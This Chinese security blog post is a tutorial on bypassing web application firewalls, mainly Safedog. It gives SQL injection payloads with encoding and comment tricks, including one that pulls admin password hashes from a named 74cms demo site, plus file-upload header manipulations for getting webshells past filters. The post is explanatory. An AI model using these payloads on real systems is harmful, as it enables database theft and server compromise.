<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>






<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Hexo, NexT" />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />






<meta name="description" content="WAF绕过技术使用大小写变种有的过滤器会过滤掉SQL语句中的关键字，比如SELECT,FROM等，因为数据库使用不区分大小写的方式来处理SQL关键字，所以可以使用大小写变种来绕过，例如：    &amp;#39; UNION SELECT password FROM USERS WHERE username=&amp;#39;admin&amp;#39;--可以替换成：    &amp;#39; UNiON SelECT pas">
<meta property="og:type" content="article">
<meta property="og:title" content="WAF绕过技术总结">
<meta property="og:url" content="http://yoursite.com/2017/08/17/WAF绕过技术总结/index.html">
<meta property="og:site_name" content="Note&#39;s blog">
<meta property="og:description" content="WAF绕过技术使用大小写变种有的过滤器会过滤掉SQL语句中的关键字，比如SELECT,FROM等，因为数据库使用不区分大小写的方式来处理SQL关键字，所以可以使用大小写变种来绕过，例如：    &amp;#39; UNION SELECT password FROM USERS WHERE username=&amp;#39;admin&amp;#39;--可以替换成：    &amp;#39; UNiON SelECT pas">
<meta property="og:image" content="http://yoursite.com/2017/08/17/WAF绕过技术总结/mysql注释替换空格.jpg">
<meta property="og:image" content="http://yoursite.com/2017/08/17/WAF绕过技术总结/mssql注释替换空格.jpg">
<meta property="og:image" content="http://yoursite.com/2017/08/17/WAF绕过技术总结/删除content.jpg">
<meta property="og:image" content="http://yoursite.com/2017/08/17/WAF绕过技术总结/字段.png">
<meta property="og:image" content="http://yoursite.com/2017/08/17/WAF绕过技术总结/双文件上传.jpg">
<meta property="og:image" content="http://yoursite.com/2017/08/17/WAF绕过技术总结/filename.png">
<meta property="og:image" content="http://yoursite.com/2017/08/17/WAF绕过技术总结/tab.png">
<meta property="og:image" content="http://yoursite.com/2017/08/17/WAF绕过技术总结/mysql测试.jpg">
<meta property="og:updated_time" content="2017-12-21T06:28:26.108Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="WAF绕过技术总结">
<meta name="twitter:description" content="WAF绕过技术使用大小写变种有的过滤器会过滤掉SQL语句中的关键字，比如SELECT,FROM等，因为数据库使用不区分大小写的方式来处理SQL关键字，所以可以使用大小写变种来绕过，例如：    &amp;#39; UNION SELECT password FROM USERS WHERE username=&amp;#39;admin&amp;#39;--可以替换成：    &amp;#39; UNiON SelECT pas">
<meta name="twitter:image" content="http://yoursite.com/2017/08/17/WAF绕过技术总结/mysql注释替换空格.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2017/08/17/WAF绕过技术总结/"/>





  <title>WAF绕过技术总结 | Note's blog</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  














  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Note's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-commonweal">
          <a href="/404.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br />
            
            公益404
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocapitalize="off" autocomplete="off" autocorrect="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2017/08/17/WAF绕过技术总结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Note">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/favico.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Note's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                WAF绕过技术总结
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-08-17T17:37:05+08:00">
                2017-08-17
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web安全/" itemprop="url" rel="index">
                    <span itemprop="name">Web安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="WAF绕过技术"><a href="#WAF绕过技术" class="headerlink" title="WAF绕过技术"></a>WAF绕过技术</h1><h2 id="使用大小写变种"><a href="#使用大小写变种" class="headerlink" title="使用大小写变种"></a>使用大小写变种</h2><p>有的过滤器会过滤掉SQL语句中的关键字，比如SELECT,FROM等，因为数据库使用不区分大小写的方式来处理SQL关键字，所以可以使用大小写变种来绕过，例如：<br>    <code>&#39; UNION SELECT password FROM USERS WHERE username=&#39;admin&#39;--</code><br>可以替换成：<br>    <code>&#39; UNiON SelECT password FRoM USERS WHErE username=&#39;admin&#39;--</code></p>
<h2 id="使用内联注释"><a href="#使用内联注释" class="headerlink" title="使用内联注释"></a>使用内联注释</h2><p>有的过滤器会过滤掉注入语句中的空格字符，可以考虑使用内联注释的方法绕过：<br>    <code>&#39;/**/UNION/**/SELECT/**/password/**/FROM/**/USERS/**/WHERE/**/username=&#39;admin&#39;--</code><br>如果同时过滤了‘=’，可以使用‘LIKE’关键字来替换：<br>    <code>&#39;/**/UNION/**/SELECT/**/password/**/FROM/**/USERS/**/WHERE/**/username/**/LIKE/**/&#39;admin&#39;--</code><br>注意：在MySQL中，甚至可以在关键字中使用内联注释来绕过WAF的关键字拦截：<br>    <code>&#39;/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/**/OM/**/USERS/**/WH/**/ERE/**/username/**/LIKE/**/&#39;admin&#39;--</code><br><strong>实际测试中，该方法行不通。</strong><br><img src="/2017/08/17/WAF绕过技术总结/mysql注释替换空格.jpg" alt=""><br><a id="more"></a><br><img src="/2017/08/17/WAF绕过技术总结/mssql注释替换空格.jpg" alt=""></p>
<h2 id="使用URL编码"><a href="#使用URL编码" class="headerlink" title="使用URL编码"></a>使用URL编码</h2><p>有的过滤器会过滤空格和内联注释序列/*，但是无法阻止以URL编码表示的注释序列。<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">%2F%2A*/UNION%2F%2A*/SELECT%2F%2A*/password%2F%2A*/FROM%2F%2A*/USERS%2F%2A*/WHERE%2F%2A*/username%2F%2A*/LIKE%2F%2A*/<span class="string">'admin'</span>--</div></pre></td></tr></table></figure></p>
<p>以上这种方式如果不起作用的话，可以考虑使用URL双编码，即对上面攻击语句中的‘%’在一次进行URL编码，比如单引号的URL编码为%27，再一次编码为%2527（%的URL编码为%25）：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">%252F%252A*/UNION%252F%252A*/SELECT%252F%252A*/password%252F%252A*/FROM%252F%252A*/USERS%252F%252A*/WHERE%252F%252A*/username%252F%252A*/LIKE%252F%252A*/<span class="string">'admin'</span>--</div></pre></td></tr></table></figure></p>
<p>或者将真个注入语句进行URL编码。<br>如果想将特殊字符带入到数据库中执行，建议将输入得到语句全部进行URL编码之后发送。</p>
<h2 id="使用16进制编码"><a href="#使用16进制编码" class="headerlink" title="使用16进制编码"></a>使用16进制编码</h2><p>使用十六进制数来实例化字符串：<br>    <code>SELECT password FROM USERS</code><br>16进制编码为：0x53454C4543542070617373776F72642046524F4D205553455253，可以按照下面的构造来动态执行：<br>    <code>DECLARE @query VARCHAR(100) SELECT @query = 0x53454C4543542070617373776F72642046524F4D205553455253 EXEC(@query)</code></p>
<h2 id="使用空字节"><a href="#使用空字节" class="headerlink" title="使用空字节"></a>使用空字节</h2><p>在IPS和WAF等硬件设备中，这些设备考虑到性能的因素，一般使用原生语言编写，比如C++，对于这些语言，空字节代表字符串的结尾。过滤器如果遇到空字节，后面的内容不会处理，可以使用下面的语句来绕过：<br>    <code>%00&#39; UNION SELECT password FROM USERS WHERE username=&#39;admin&#39;--</code></p>
<h2 id="嵌套剥离后的表达式"><a href="#嵌套剥离后的表达式" class="headerlink" title="嵌套剥离后的表达式"></a>嵌套剥离后的表达式</h2><p>有些过滤器会剥离用户输入中的特性字符，但是不会做递归处理，所以有如下方式：<br>seselectlect</p>
<h2 id="利用截断"><a href="#利用截断" class="headerlink" title="利用截断"></a>利用截断</h2><p>假如一个过滤器有如下功能：<br>1.对单引号进行双重编码，使用两个单引号(‘’)替换所有的单引号(‘)；<br>2.将每一项截断成16个字符；<br>假如输入：admin’–，那么结果会变成：<br>    <code>SELECT uid FROM USERS WHERE username =&#39;admin&#39;&#39;--&#39; AND password=&#39;&#39;</code><br>如果输入15个a加上一个’，那么会自动将’变成’’，这样有17个字符，然后截断成16个字符，就消掉了最后一个’。<br>带入到数据库查询会报错，因为有一个单引号未闭合：<br>    <code>SELECT uid FROM USERS WHERE username =&#39;aaaaaaaaaaaaaaa&#39;&#39; AND password=&#39;&#39;</code><br>但是password字段也可以插入，所以破解的办法是，在另一个字段想办法闭合，在password字段输入 or 1=1–：<br>    <code>SELECT uid FROM USERS WHERE username =&#39;aaaaaaaaaaaaaaa&#39;&#39; AND password=&#39; or 1=1 --&#39;</code><br>上面的语句中，username=aaaaaaaaaaaaaaa’’ AND password=，后面or 1=1，条件永真。</p>
<h2 id="伪造搜索引擎"><a href="#伪造搜索引擎" class="headerlink" title="伪造搜索引擎"></a>伪造搜索引擎</h2><p>早些版本的安全狗有这个漏洞，把User-Agent修改为搜索引擎，便可以绕过，进行sql注入等攻击。<br>原理：网站的WAF，一般会把搜索引擎的爬虫放到白名单里面，不然SEO就蛋疼了。</p>
<h2 id="查找真实IP"><a href="#查找真实IP" class="headerlink" title="查找真实IP"></a>查找真实IP</h2><p>这个方法可以用于安全宝、加速乐等云WAF，云WAF的原理通过DNS解析到云WAF，过滤之后，最后访问原始服务器，如果我们能通过一些手段找到原始的服务器地址，便可以绕过。查找网站历史IP：<br>    <code>http://toolbar.netcraft.com/site_report</code></p>
<h2 id="修改请求方式绕过"><a href="#修改请求方式绕过" class="headerlink" title="修改请求方式绕过"></a>修改请求方式绕过</h2><p>有时候WAF对GET请求进行了过滤，但是Cookie或者POST参数却没有检测。</p>
<h2 id="复参数绕过"><a href="#复参数绕过" class="headerlink" title="复参数绕过"></a>复参数绕过</h2><p>例如一个请求是这样的：<br>    <code>GET /pen/news.php?id=1 union select user,password from MySQL.user</code><br>可以修改为:<br>    <code>GET /pen/news.php?id=1&amp;id=union&amp;id=select&amp;id=user,password&amp;id=from%20mysql.user</code></p>
<h1 id="安全狗绕过技术"><a href="#安全狗绕过技术" class="headerlink" title="安全狗绕过技术"></a>安全狗绕过技术</h1><h2 id="上传绕过"><a href="#上传绕过" class="headerlink" title="上传绕过"></a>上传绕过</h2><h3 id="删除实体里面的Content-Type字段"><a href="#删除实体里面的Content-Type字段" class="headerlink" title="删除实体里面的Content-Type字段"></a>删除实体里面的Content-Type字段</h3><p><img src="/2017/08/17/WAF绕过技术总结/删除content.jpg" alt=""></p>
<h3 id="删除Content-Disposition字段里的空格"><a href="#删除Content-Disposition字段里的空格" class="headerlink" title="删除Content-Disposition字段里的空格"></a>删除Content-Disposition字段里的空格</h3><p>Content-Disposition: form-data; name=”file”; filename=”yijuhua.php”<br>删除上面字段冒号后的空格或者name前面的空格。</p>
<h3 id="修改Content-Disposition字段值的大小写"><a href="#修改Content-Disposition字段值的大小写" class="headerlink" title="修改Content-Disposition字段值的大小写"></a>修改Content-Disposition字段值的大小写</h3><p>Content-Disposition: form-data; name=”file”; filename=”yijuhua.php”<br>将name替换成nAme。</p>
<h3 id="字段中插入干扰字符"><a href="#字段中插入干扰字符" class="headerlink" title="字段中插入干扰字符"></a>字段中插入干扰字符</h3><p>网站具有任意文件上传漏洞，但是安全狗拦截危险的脚本文件后缀，比如php、asp、aspx等，可以在Content-Disposition字段和filename字段之间插入任意大于或者等于508个长度的字符，再配合特殊文件名（文件名中间需要有分分号或者单引号），能够绕过安全狗的上传限制。<br><img src="/2017/08/17/WAF绕过技术总结/字段.png" alt=""></p>
<pre><code>Content-Disposition:form-data;name=&quot;file&quot;;_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_......;Filename=&quot;tea;sd.cer&quot;
</code></pre><p>注意：以上方法绕过安全狗的上传还需要使用免杀的一句话马，安全狗具备webshell查杀功能。</p>
<h3 id="双文件上传"><a href="#双文件上传" class="headerlink" title="双文件上传"></a>双文件上传</h3><p>安全狗有专门的文件上传防御模块，禁止cdx、cer、cgi、dll、exe、jsp、php、asp、aspx等类型的文件上传。<br><img src="/2017/08/17/WAF绕过技术总结/双文件上传.jpg" alt=""><br>安全狗进行文件名匹配时候用的是第一个文件名test.jpg，是符合安全要求的，第二个文件没有检查，但是webserver在保存文件的时候却保存了第二个文件名test.php。</p>
<h3 id="超长文件名"><a href="#超长文件名" class="headerlink" title="超长文件名"></a>超长文件名</h3><p>修改上传的文件名为超长文件名。</p>
<h3 id="文件大小"><a href="#文件大小" class="headerlink" title="文件大小"></a>文件大小</h3><p>修改上传文件内容，在内容中加很多注释，据说文件大小达到1.5m时，安全狗不在检测。</p>
<h3 id="文件名空字符"><a href="#文件名空字符" class="headerlink" title="文件名空字符"></a>文件名空字符</h3><p>在filename=后面加上空格，TAB等空字符再跟上文件名，可以绕过dog的上传检测。<br><img src="/2017/08/17/WAF绕过技术总结/filename.png" alt=""></p>
<h3 id="空字符"><a href="#空字符" class="headerlink" title="空字符"></a>空字符</h3><p>在分号的前后加上一定数量的TAB，在测试中是加入了466个TAB字符，可以绕过dog的上传检测。<br><img src="/2017/08/17/WAF绕过技术总结/tab.png" alt=""></p>
<h2 id="注入绕过"><a href="#注入绕过" class="headerlink" title="注入绕过"></a>注入绕过</h2><h3 id="用于绕过的核心字符：-0A，某些特殊场合需要和注释符配合使用。"><a href="#用于绕过的核心字符：-0A，某些特殊场合需要和注释符配合使用。" class="headerlink" title="用于绕过的核心字符：%0A，某些特殊场合需要和注释符配合使用。"></a>用于绕过的核心字符：%0A，某些特殊场合需要和注释符配合使用。</h3><p>原理：%0A为换行符，在MySQL和MSSQL中，能够替换空格。<br>MSSQL：<br>测试语句：<br>    <code>http://192.168.1.152/cart.aspx?act=buy&amp;id=1 and 1=user</code><br>and作为关键字被安全狗拦截。<br>测试语句改为：<br>    <code>http://192.168.1.152/cart.aspx?act=buy&amp;id=1%0Aand 1=user</code><br>成功绕过。<br>MySQL：<br>测试语句：<br>    <code>http://192.168.91.152:8000/About.php?id=2 and 1=1</code><br>and作为关键字被安全狗拦截。<br>测试语句改为：<br>    <code>http://192.168.91.152:8000/About.php?id=2%0Aand/**/1=1</code></p>
<h3 id="输入如下被拦截"><a href="#输入如下被拦截" class="headerlink" title="输入如下被拦截"></a>输入如下被拦截</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">http://demo.74cms.com/plus/ajax_common.php?act=hotword&amp;query=錦<span class="string">'union select 1,group_concat(admin_name,0x3a,pwd,0x3a,pwd_hash),3 from qs_admin #</span></div></pre></td></tr></table></figure>
<p>绕过办法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">http://demo.74cms.com/plus/ajax_common.php?act=hotword&amp;query=錦<span class="string">'union /*!50000SeLect*/ 1,group_concat(admin_name,0x3a,pwd,0x3a,pwd_hash),3 from qs_admin #</span></div></pre></td></tr></table></figure></p>
<p>原理：<br>安全狗拦截的是select关键字，那么把select换成<br>    <code>/*!50000SeLect*/</code><br>就能够绕过，上面代码的意思：当MySQL版本大于或等于50000，也就是版本大于或者等于5.0时，那么该注释会被解析成代码。</p>
<p>实际测试：<br> <code>/*!select*//**/*/**//*!from*//**/user;</code><br>能够执行，中间的50000不写，应该默认的是最低版本。<br><img src="/2017/08/17/WAF绕过技术总结/mysql测试.jpg" alt=""><br>所以绕过语句还能写成如下的形式：<br>注入语句：<br> <code>http://192.168.1.3/typeid.php?typeid=1 and 1=2 union select 1,2,3,4,5</code><br>绕过语句：<br> <code>http://192.168.1.3/typeid.php?typeid=1/*!and*/1=2%20/*!union*//*!select*/1,2,3,4,5</code><br>初步判断出安全狗的正则匹配应该是“\s+and”这类的形式，也就是空字符或者空格后匹配敏感字符，所以只要想办法去掉空格安全狗就无法匹配，但是<code>/**/</code>安全狗做了匹配。所以可以使用<code>/*!50000*/</code>来绕过。</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/08/12/阿里云相关安全产品的工作原理/" rel="next" title="阿里云相关安全产品的工作原理">
                <i class="fa fa-chevron-left"></i> 阿里云相关安全产品的工作原理
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/09/15/Burp抓不到登陆数据包/" rel="prev" title="Burp抓不到登陆数据包?">
                Burp抓不到登陆数据包? <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/favico.gif"
               alt="Note" />
          <p class="site-author-name" itemprop="name">Note</p>
           
              <p class="site-description motion-element" itemprop="description">布施、持戒、忍辱、精进、禅定、般若</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">100</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">6</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">33</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="" target="_blank" title="微博">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  微博
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="" target="_blank" title="豆瓣">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  豆瓣
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="" target="_blank" title="知乎">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  知乎
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.freebuf.com/" title="FreeBuf" target="_blank">FreeBuf</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.ichunqiu.com/" title="i春秋" target="_blank">i春秋</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.amobbs.com/" title="amoBBS" target="_blank">amoBBS</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.codesec.net/" title="CodeSec" target="_blank">CodeSec</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://new.butian.360.cn/" title="补天" target="_blank">补天</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://klionsec.github.io/" title="klion" target="_blank">klion</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://bbs.pediy.com/" title="看雪论坛" target="_blank">看雪论坛</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.vulbox.com/" title="漏洞盒子" target="_blank">漏洞盒子</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.91ri.org/" title="91ri" target="_blank">91ri</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hacktech.cn/" title="Akkuman" target="_blank">Akkuman</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://fatofyoung.github.io/" title="fatofyoung" target="_blank">fatofyoung</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.waitalone.cn/" title="waitalone" target="_blank">waitalone</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.cnseay.com/" title="seay" target="_blank">seay</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#WAF绕过技术"><span class="nav-number">1.</span> <span class="nav-text">WAF绕过技术</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#使用大小写变种"><span class="nav-number">1.1.</span> <span class="nav-text">使用大小写变种</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#使用内联注释"><span class="nav-number">1.2.</span> <span class="nav-text">使用内联注释</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#使用URL编码"><span class="nav-number">1.3.</span> <span class="nav-text">使用URL编码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#使用16进制编码"><span class="nav-number">1.4.</span> <span class="nav-text">使用16进制编码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#使用空字节"><span class="nav-number">1.5.</span> <span class="nav-text">使用空字节</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#嵌套剥离后的表达式"><span class="nav-number">1.6.</span> <span class="nav-text">嵌套剥离后的表达式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用截断"><span class="nav-number">1.7.</span> <span class="nav-text">利用截断</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#伪造搜索引擎"><span class="nav-number">1.8.</span> <span class="nav-text">伪造搜索引擎</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#查找真实IP"><span class="nav-number">1.9.</span> <span class="nav-text">查找真实IP</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#修改请求方式绕过"><span class="nav-number">1.10.</span> <span class="nav-text">修改请求方式绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#复参数绕过"><span class="nav-number">1.11.</span> <span class="nav-text">复参数绕过</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#安全狗绕过技术"><span class="nav-number">2.</span> <span class="nav-text">安全狗绕过技术</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#上传绕过"><span class="nav-number">2.1.</span> <span class="nav-text">上传绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#删除实体里面的Content-Type字段"><span class="nav-number">2.1.1.</span> <span class="nav-text">删除实体里面的Content-Type字段</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#删除Content-Disposition字段里的空格"><span class="nav-number">2.1.2.</span> <span class="nav-text">删除Content-Disposition字段里的空格</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#修改Content-Disposition字段值的大小写"><span class="nav-number">2.1.3.</span> <span class="nav-text">修改Content-Disposition字段值的大小写</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#字段中插入干扰字符"><span class="nav-number">2.1.4.</span> <span class="nav-text">字段中插入干扰字符</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#双文件上传"><span class="nav-number">2.1.5.</span> <span class="nav-text">双文件上传</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#超长文件名"><span class="nav-number">2.1.6.</span> <span class="nav-text">超长文件名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#文件大小"><span class="nav-number">2.1.7.</span> <span class="nav-text">文件大小</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#文件名空字符"><span class="nav-number">2.1.8.</span> <span class="nav-text">文件名空字符</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#空字符"><span class="nav-number">2.1.9.</span> <span class="nav-text">空字符</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#注入绕过"><span class="nav-number">2.2.</span> <span class="nav-text">注入绕过</span></a><ol class="nav-child"><li class="nav-item 